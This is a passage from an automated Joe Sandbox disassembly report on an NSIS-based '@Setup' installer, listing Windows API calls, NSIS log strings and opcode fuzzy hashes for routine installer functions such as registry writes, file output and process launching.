                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                    • String ID: F
                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                    • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                    • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                    • API String ID: 3734993849-3206598305
                                                                                                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                    Strings
                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                    • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                    • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                    Strings
                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                    Strings
                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                    • String ID: f
                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                    • MulDiv.KERNEL32(00010600,00000064,046024F2), ref: 00403295
                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                    Strings
                                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                    APIs
                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GlobalFree.KERNEL32(00781108), ref: 00402387
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$RaFill
                                                                                                                                                    • API String ID: 1459762280-1579788240
                                                                                                                                                    • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                    • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    • GlobalFree.KERNEL32(00781108), ref: 00402387
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                    • String ID: !
                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                    • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                    • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
